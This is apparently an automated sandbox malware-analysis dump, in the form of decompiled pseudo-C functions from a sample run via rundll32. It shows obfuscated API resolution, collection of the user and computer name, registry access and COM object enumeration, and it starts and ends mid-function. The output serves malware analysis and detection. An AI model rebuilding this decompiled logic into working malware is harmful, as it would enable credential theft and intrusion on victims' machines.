                                          						_t32 = GetProcAddress(_t48, _t5);
                                          						 *(_t54 + 0x10) = _t32;
                                          						if(_t32 == 0) {
                                          							goto L8;
                                          						} else {
                                          							_t33 =  *0x47bd2a4; // 0x24fa5a8
                                          							_t7 = _t33 + 0x47be40b; // 0x6e55775a
                                          							_t35 = GetProcAddress(_t48, _t7);
                                          							 *(_t54 + 0x14) = _t35;
                                          							if(_t35 == 0) {
                                          								goto L8;
                                          							} else {
                                          								_t36 =  *0x47bd2a4; // 0x24fa5a8
                                          								_t9 = _t36 + 0x47be4d2; // 0x4e6c7452
                                          								_t38 = GetProcAddress(_t48, _t9);
                                          								 *(_t54 + 0x18) = _t38;
                                          								if(_t38 == 0) {
                                          									goto L8;
                                          								} else {
                                          									_t39 =  *0x47bd2a4; // 0x24fa5a8
                                          									_t11 = _t39 + 0x47be779; // 0x6c43775a
                                          									_t41 = GetProcAddress(_t48, _t11);
                                          									 *(_t54 + 0x1c) = _t41;
                                          									if(_t41 == 0) {
                                          										goto L8;
                                          									} else {
                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                          										_t44 = E047B7B01(_t54, _a8);
                                          										_v8 = _t44;
                                          										if(_t44 != 0) {
                                          											goto L8;
                                          										} else {
                                          											 *_a12 = _t54;
                                          										}
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v8;
                                          			}



















                                          APIs
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047B14AF,?,?,?,?,00000000,00000000), ref: 047B57FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 047B581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 047B5835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047B584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047B5861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047B5877
                                            • Part of subcall function 047B7B01: memset.NTDLL ref: 047B7B80
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: dffd09a79d1f89d42dbfbdf839b26ff8bd6a8fada17e24c52bff99e464b2d547
                                          • Instruction ID: 567eb19cdff29657c752144c28c266346ef1d1b6435fabcb74775f2b53147148
                                          • Opcode Fuzzy Hash: dffd09a79d1f89d42dbfbdf839b26ff8bd6a8fada17e24c52bff99e464b2d547
                                          • Instruction Fuzzy Hash: 93211EB160064BAFEB21DFA9C944FDA77ECEF443187058425E989DB311EA74E9058BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 88%
                                          			E047BA642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
                                          				signed int _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				void _v284;
                                          				void* __esi;
                                          				char* _t60;
                                          				intOrPtr* _t61;
                                          				intOrPtr _t65;
                                          				char _t68;
                                          				intOrPtr _t72;
                                          				void* _t73;
                                          				intOrPtr _t75;
                                          				void* _t78;
                                          				void* _t88;
                                          				void* _t96;
                                          				void* _t97;
                                          				int _t102;
                                          				signed int* _t104;
                                          				intOrPtr* _t105;
                                          				void* _t106;
                                          
                                          				_t97 = __ecx;
                                          				_v8 = _v8 & 0x00000000;
                                          				_t102 = _a16;
                                          				if(_t102 == 0) {
                                          					__imp__( &_v284,  *0x47bd33c);
                                          					_t96 = 0x80000002;
                                          					L6:
                                          					_t60 = E047BA5E9(0,  &_v284);
                                          					_a8 = _t60;
                                          					if(_t60 == 0) {
                                          						_v8 = 8;
                                          						L29:
                                          						_t61 = _a20;
                                          						if(_t61 != 0) {
                                          							 *_t61 =  *_t61 + 1;
                                          						}
                                          						return _v8;
                                          					}
                                          					_t105 = _a24;
                                          					if(E047B621D(_t97, _t105, _t96, _t60) != 0) {
                                          						L27:
                                          						E047B147E(_a8);
                                          						goto L29;
                                          					}
                                          					_t65 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t16 = _t65 + 0x47be8de; // 0x65696c43
                                          					_t68 = E047BA5E9(0, _t16);
                                          					_a24 = _t68;
                                          					if(_t68 == 0) {
                                          						L14:
                                          						_t29 = _t105 + 0x14; // 0x102
                                          						_t33 = _t105 + 0x10; // 0x3d047bc0
                                          						if(E047B4C9A( *_t33, _t96, _a8,  *0x47bd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
                                          							_t72 =  *0x47bd2a4; // 0x24fa5a8
                                          							if(_t102 == 0) {
                                          								_t35 = _t72 + 0x47bea54; // 0x4d4c4b48
                                          								_t73 = _t35;
                                          							} else {
                                          								_t34 = _t72 + 0x47bea4f; // 0x55434b48
                                          								_t73 = _t34;
                                          							}
                                          							if(E047B30FC( &_a24, _t73,  *0x47bd334,  *0x47bd338,  &_a24,  &_a16) == 0) {
                                          								if(_t102 == 0) {
                                          									_t75 =  *0x47bd2a4; // 0x24fa5a8
                                          									_t44 = _t75 + 0x47be856; // 0x74666f53
                                          									_t78 = E047BA5E9(0, _t44);
                                          									_t103 = _t78;
                                          									if(_t78 == 0) {
                                          										_v8 = 8;
                                          									} else {
                                          										_t47 = _t105 + 0x10; // 0x3d047bc0
                                          										E047B1BC1( *_t47, _t96, _a8,  *0x47bd338, _a24);
                                          										_t49 = _t105 + 0x10; // 0x3d047bc0
                                          										E047B1BC1( *_t49, _t96, _t103,  *0x47bd330, _a16);
                                          										E047B147E(_t103);
                                          									}
                                          								} else {
                                          									_t40 = _t105 + 0x10; // 0x3d047bc0
                                          									E047B1BC1( *_t40, _t96, _a8,  *0x47bd338, _a24);
                                          									_t43 = _t105 + 0x10; // 0x3d047bc0
                                          									E047B1BC1( *_t43, _t96, _a8,  *0x47bd330, _a16);
                                          								}
                                          								if( *_t105 != 0) {
                                          									E047B147E(_a24);
                                          								} else {
                                          									 *_t105 = _a16;
                                          								}
                                          							}
                                          						}
                                          						goto L27;
                                          					}
                                          					_t21 = _t105 + 0x10; // 0x3d047bc0
                                          					if(E047B74B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
                                          						_t104 = _v16;
                                          						_t88 = 0x28;
                                          						if(_v12 == _t88) {
                                          							 *_t104 =  *_t104 & 0x00000000;
                                          							_t26 = _t105 + 0x10; // 0x3d047bc0
                                          							E047B4C9A( *_t26, _t96, _a8, _a24, _t104);
                                          						}
                                          						E047B147E(_t104);
                                          						_t102 = _a16;
                                          					}
                                          					E047B147E(_a24);
                                          					goto L14;
                                          				}
                                          				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                          					goto L29;
                                          				} else {
                                          					memcpy( &_v284, _a8, _t102);
                                          					__imp__(_t106 + _t102 - 0x117,  *0x47bd33c);
                                          					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
                                          					_t96 = 0x80000003;
                                          					goto L6;
                                          				}
                                          			}
























                                          APIs
                                          • StrChrA.SHLWAPI(047B553C,0000005F,00000000,00000000,00000104), ref: 047BA675
                                          • memcpy.NTDLL(?,047B553C,?), ref: 047BA68E
                                          • lstrcpy.KERNEL32(?), ref: 047BA6A4
                                            • Part of subcall function 047BA5E9: lstrlen.KERNEL32(?,00000000,047BD330,00000001,047B937A,047BD00C,047BD00C,00000000,00000005,00000000,00000000,?,?,?,047B207E,?), ref: 047BA5F2
                                            • Part of subcall function 047BA5E9: mbstowcs.NTDLL ref: 047BA619
                                            • Part of subcall function 047BA5E9: memset.NTDLL ref: 047BA62B
                                            • Part of subcall function 047B1BC1: lstrlenW.KERNEL32(047B553C,?,?,047BA818,3D047BC0,80000002,047B553C,047B9642,74666F53,4D4C4B48,047B9642,?,3D047BC0,80000002,047B553C,?), ref: 047B1BE1
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 047BA6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 12ef03805018a798820d00a4ea4d47bd0554dc5d9d7b633f21ef237385cd6909
                                          • Instruction ID: 37b30408e8f762e9fca66ed3f46d6bfa2818a0348e5489042a96aea0fc8197c8
                                          • Opcode Fuzzy Hash: 12ef03805018a798820d00a4ea4d47bd0554dc5d9d7b633f21ef237385cd6909
                                          • Instruction Fuzzy Hash: D8518D7250020AEFEF22AFA0DD44FDA3BB9EF04354F008528F99596621E739E915DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E047B614A() {
                                          				long _v8;
                                          				long _v12;
                                          				int _v16;
                                          				long _t39;
                                          				long _t43;
                                          				signed int _t47;
                                          				short _t51;
                                          				signed int _t52;
                                          				int _t56;
                                          				int _t57;
                                          				char* _t64;
                                          				short* _t67;
                                          
                                          				_v16 = 0;
                                          				_v8 = 0;
                                          				GetUserNameW(0,  &_v8);
                                          				_t39 = _v8;
                                          				if(_t39 != 0) {
                                          					_v12 = _t39;
                                          					_v8 = 0;
                                          					GetComputerNameW(0,  &_v8);
                                          					_t43 = _v8;
                                          					if(_t43 != 0) {
                                          						_v12 = _v12 + _t43 + 2;
                                          						_t64 = E047B58BE(_v12 + _t43 + 2 << 2);
                                          						if(_t64 != 0) {
                                          							_t47 = _v12;
                                          							_t67 = _t64 + _t47 * 2;
                                          							_v8 = _t47;
                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                          								L7:
                                          								E047B147E(_t64);
                                          							} else {
                                          								_t51 = 0x40;
                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                          								_t52 = _v8;
                                          								_v12 = _v12 - _t52;
                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                          									goto L7;
                                          								} else {
                                          									_t56 = _v12 + _v8;
                                          									_t31 = _t56 + 2; // 0x47b5210
                                          									_v12 = _t56;
                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                          									_v8 = _t57;
                                          									if(_t57 == 0) {
                                          										goto L7;
                                          									} else {
                                          										_t64[_t57] = 0;
                                          										_v16 = _t64;
                                          									}
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _v16;
                                          			}
















                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,047B520E), ref: 047B615E
                                          • GetComputerNameW.KERNEL32(00000000,047B520E), ref: 047B617A
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • GetUserNameW.ADVAPI32(00000000,047B520E), ref: 047B61B4
                                          • GetComputerNameW.KERNEL32(047B520E,?), ref: 047B61D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,047B520E,00000000,047B5210,00000000,00000000,?,?,047B520E), ref: 047B61FA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 403fef259996c584927f7d0cec4466a0326eed5e978785f4074704e10d8772f1
                                          • Instruction ID: 78dca02ab55d3f0e0fdeccde565d8337880b45a8cdc64c1befb27b87ec06e915
                                          • Opcode Fuzzy Hash: 403fef259996c584927f7d0cec4466a0326eed5e978785f4074704e10d8772f1
                                          • Instruction Fuzzy Hash: 9F21EFB5900108FFDB11DFE5DA84EEEBBBCEF44304B50446AE645E7200D634AB44DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E047B62CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
                                          				char _v5;
                                          				signed int _v12;
                                          				intOrPtr _v16;
                                          				char _t28;
                                          				void* _t36;
                                          				void* _t41;
                                          				char* _t42;
                                          				void* _t44;
                                          				void* _t49;
                                          				void* _t50;
                                          				int _t51;
                                          				int _t54;
                                          				void* _t55;
                                          
                                          				_t49 = _a4;
                                          				_t55 = __eax;
                                          				_v12 = 0xb;
                                          				if(_t49 != 0 && __eax != 0) {
                                          					_t5 = _t55 - 1; // -1
                                          					_t42 = _t49 + _t5;
                                          					_t28 =  *_t42;
                                          					_v5 = _t28;
                                          					 *_t42 = 0;
                                          					__imp__(_a8, _t41);
                                          					_v16 = _t28;
                                          					_t50 =  *0x47bd114(_t49, _a8);
                                          					if(_t50 != 0) {
                                          						 *_t42 = _v5;
                                          						_t44 = RtlAllocateHeap( *0x47bd238, 0, _a16 + __eax);
                                          						if(_t44 == 0) {
                                          							_v12 = 8;
                                          						} else {
                                          							_t51 = _t50 - _a4;
                                          							memcpy(_t44, _a4, _t51);
                                          							_t36 = memcpy(_t44 + _t51, _a12, _a16);
                                          							_t45 = _v16;
                                          							_t54 = _a16;
                                          							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
                                          							 *_a20 = _t44;
                                          							_v12 = _v12 & 0x00000000;
                                          							 *_a24 = _t55 - _v16 + _t54;
                                          						}
                                          					}
                                          				}
                                          				return _v12;
                                          			}

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 047B6301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 047B632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 047B6341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 047B6350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 047B636B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E047B9FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                          				void* __esi;
                                          				long _t10;
                                          				void* _t18;
                                          				void* _t22;
                                          
                                          				_t9 = __eax;
                                          				_t22 = __eax;
                                          				if(_a4 != 0 && E047B6B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                          					L9:
                                          					return GetLastError();
                                          				}
                                          				_t10 = E047BA96C(_t9, _t18, _t22, _a8);
                                          				if(_t10 == 0) {
                                          					ResetEvent( *(_t22 + 0x1c));
                                          					ResetEvent( *(_t22 + 0x20));
                                          					_push(0);
                                          					_push(0);
                                          					_push(0xffffffff);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                          					if( *0x47bd12c() != 0) {
                                          						SetEvent( *(_t22 + 0x1c));
                                          						goto L7;
                                          					} else {
                                          						_t10 = GetLastError();
                                          						if(_t10 == 0x3e5) {
                                          							L7:
                                          							_t10 = 0;
                                          						}
                                          					}
                                          				}
                                          				if(_t10 == 0xffffffff) {
                                          					goto L9;
                                          				}
                                          				return _t10;
                                          			}

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,047B66AF,?,?,00000000,00000000), ref: 047BA021
                                          • ResetEvent.KERNEL32(?), ref: 047BA026
                                          • GetLastError.KERNEL32 ref: 047BA03E
                                          • GetLastError.KERNEL32(?,?,00000102,047B66AF,?,?,00000000,00000000), ref: 047BA059
                                            • Part of subcall function 047B6B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,047BA006,?,?,?,?,00000102,047B66AF,?,?,00000000), ref: 047B6B7A
                                            • Part of subcall function 047B6B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047BA006,?,?,?,?,00000102,047B66AF,?), ref: 047B6BD8
                                            • Part of subcall function 047B6B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 047B6BE8
                                          • SetEvent.KERNEL32(?), ref: 047BA04C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E047B6A7F(intOrPtr _a4) {
                                          				void* _t2;
                                          				unsigned int _t4;
                                          				void* _t5;
                                          				long _t6;
                                          				void* _t7;
                                          				void* _t15;
                                          
                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                          				 *0x47bd26c = _t2;
                                          				if(_t2 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t4 = GetVersion();
                                          				if(_t4 != 5) {
                                          					L4:
                                          					if(_t15 <= 0) {
                                          						_t5 = 0x32;
                                          						return _t5;
                                          					}
                                          					L5:
                                          					 *0x47bd25c = _t4;
                                          					_t6 = GetCurrentProcessId();
                                          					 *0x47bd258 = _t6;
                                          					 *0x47bd264 = _a4;
                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
                                          					 *0x47bd254 = _t7;
                                          					if(_t7 == 0) {
                                          						 *0x47bd254 =  *0x47bd254 | 0xffffffff;
                                          					}
                                          					return 0;
                                          				}
                                          				if(_t4 >> 8 > 0) {
                                          					goto L5;
                                          				}
                                          				_t15 = _t4 - _t4;
                                          				goto L4;
                                          			}

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,047B90D2,?), ref: 047B6A87
                                          • GetVersion.KERNEL32 ref: 047B6A96
                                          • GetCurrentProcessId.KERNEL32 ref: 047B6AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 047B6ACF
                                          • GetLastError.KERNEL32 ref: 047B6AEE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(?), ref: 047BA09B
                                          • SysFreeString.OLEAUT32(00000000), ref: 047BA180
                                            • Part of subcall function 047B91B5: SysAllocString.OLEAUT32(047BC298), ref: 047B9205
                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 047BA1D3
                                          • SysFreeString.OLEAUT32(00000000), ref: 047BA1E2
                                            • Part of subcall function 047BA872: Sleep.KERNEL32(000001F4), ref: 047BA8BA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree$ArrayDestroySafeSleep
                                          • String ID:
                                          • API String ID: 3193056040-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E047B91B5(intOrPtr* __eax) {
                                          				void* _v8;
                                          				WCHAR* _v12;
                                          				void* _v16;
                                          				char _v20;
                                          				void* _v24;
                                          				intOrPtr _v28;
                                          				void* _v32;
                                          				intOrPtr _v40;
                                          				short _v48;
                                          				intOrPtr _v56;
                                          				short _v64;
                                          				intOrPtr* _t54;
                                          				intOrPtr* _t56;
                                          				intOrPtr _t57;
                                          				intOrPtr* _t58;
                                          				intOrPtr* _t60;
                                          				void* _t61;
                                          				intOrPtr* _t63;
                                          				intOrPtr* _t65;
                                          				short _t67;
                                          				intOrPtr* _t68;
                                          				intOrPtr* _t70;
                                          				intOrPtr* _t72;
                                          				intOrPtr* _t75;
                                          				intOrPtr* _t77;
                                          				intOrPtr _t79;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t87;
                                          				intOrPtr _t103;
                                          				intOrPtr _t109;
                                          				void* _t118;
                                          				void* _t122;
                                          				void* _t123;
                                          				intOrPtr _t130;
                                          
                                          				_t123 = _t122 - 0x3c;
                                          				_push( &_v8);
                                          				_push(__eax);
                                          				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
                                          				if(_t118 >= 0) {
                                          					_t54 = _v8;
                                          					_t103 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t5 = _t103 + 0x47be038; // 0x3050f485
                                          					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                          					_t56 = _v8;
                                          					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                          					if(_t118 >= 0) {
                                          						__imp__#2(0x47bc298);
                                          						_v28 = _t57;
                                          						if(_t57 == 0) {
                                          							_t118 = 0x8007000e;
                                          						} else {
                                          							_t60 = _v32;
                                          							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                          							_t87 = __imp__#6;
                                          							_t118 = _t61;
                                          							if(_t118 >= 0) {
                                          								_t63 = _v24;
                                          								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                          								if(_t118 >= 0) {
                                          									_t130 = _v20;
                                          									if(_t130 != 0) {
                                          										_t67 = 3;
                                          										_v64 = _t67;
                                          										_v48 = _t67;
                                          										_v56 = 0;
                                          										_v40 = 0;
                                          										if(_t130 > 0) {
                                          											while(1) {
                                          												_t68 = _v24;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t123 = _t123;
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												asm("movsd");
                                          												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
                                          												if(_t118 < 0) {
                                          													goto L16;
                                          												}
                                          												_t70 = _v8;
                                          												_t109 =  *0x47bd2a4; // 0x24fa5a8
                                          												_t28 = _t109 + 0x47be0bc; // 0x3050f1ff
                                          												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
                                          												if(_t118 >= 0) {
                                          													_t75 = _v16;
                                          													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
                                          													if(_t118 >= 0 && _v12 != 0) {
                                          														_t79 =  *0x47bd2a4; // 0x24fa5a8
                                          														_t33 = _t79 + 0x47be078; // 0x76006f
                                          														if(lstrcmpW(_v12, _t33) == 0) {
                                          															_t83 = _v16;
                                          															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
                                          														}
                                          														 *_t87(_v12);
                                          													}
                                          													_t77 = _v16;
                                          													 *((intOrPtr*)( *_t77 + 8))(_t77);
                                          												}
                                          												_t72 = _v8;
                                          												 *((intOrPtr*)( *_t72 + 8))(_t72);
                                          												_v40 = _v40 + 1;
                                          												if(_v40 < _v20) {
                                          													continue;
                                          												}
                                          												goto L16;
                                          											}
                                          										}
                                          									}
                                          								}
                                          								L16:
                                          								_t65 = _v24;
                                          								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                          							}
                                          							 *_t87(_v28);
                                          						}
                                          						_t58 = _v32;
                                          						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                          					}
                                          				}
                                          				return _t118;
                                          			}

                                          APIs
                                          • SysAllocString.OLEAUT32(047BC298), ref: 047B9205
                                          • lstrcmpW.KERNEL32(00000000,0076006F), ref: 047B92E6
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B92FF
                                          • SysFreeString.OLEAUT32(?), ref: 047B932E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloclstrcmp
                                          • String ID:
                                          • API String ID: 1885612795-0
                                          • Opcode ID: 83f90accc71d866300d4171ffaffb82881cb715c959afc6854847abafcce291f
                                          • Instruction ID: 182025292be2f19b74fe458d4d02d748cfe5e255c8a97dddb6290347aa4beeaa
                                          • Opcode Fuzzy Hash: 83f90accc71d866300d4171ffaffb82881cb715c959afc6854847abafcce291f
                                          • Instruction Fuzzy Hash: 5A5131B5D00609DFCB01DFA8C988EDEB7B5EF89704B148594EA15EB360D731AD41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 85%
                                          			E047B7664(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				void _v92;
                                          				void _v236;
                                          				void* _t55;
                                          				unsigned int _t56;
                                          				signed int _t66;
                                          				signed int _t74;
                                          				void* _t76;
                                          				signed int _t79;
                                          				void* _t81;
                                          				void* _t92;
                                          				void* _t96;
                                          				signed int* _t99;
                                          				signed int _t101;
                                          				signed int _t103;
                                          				void* _t107;
                                          
                                          				_t92 = _a12;
                                          				_t101 = __eax;
                                          				_t55 = E047B48F0(_a16, _t92);
                                          				_t79 = _t55;
                                          				if(_t79 == 0) {
                                          					L18:
                                          					return _t55;
                                          				}
                                          				_t56 =  *(_t92 + _t79 * 4 - 4);
                                          				_t81 = 0;
                                          				_t96 = 0x20;
                                          				if(_t56 == 0) {
                                          					L4:
                                          					_t97 = _t96 - _t81;
                                          					_v12 = _t96 - _t81;
                                          					E047B748A(_t79,  &_v236);
                                          					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E047B7074(_t101,  &_v236, _a8, _t96 - _t81);
                                          					E047B7074(_t79,  &_v92, _a12, _t97);
                                          					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
                                          					_t66 = E047B748A(_t101, 0x47bd1b0);
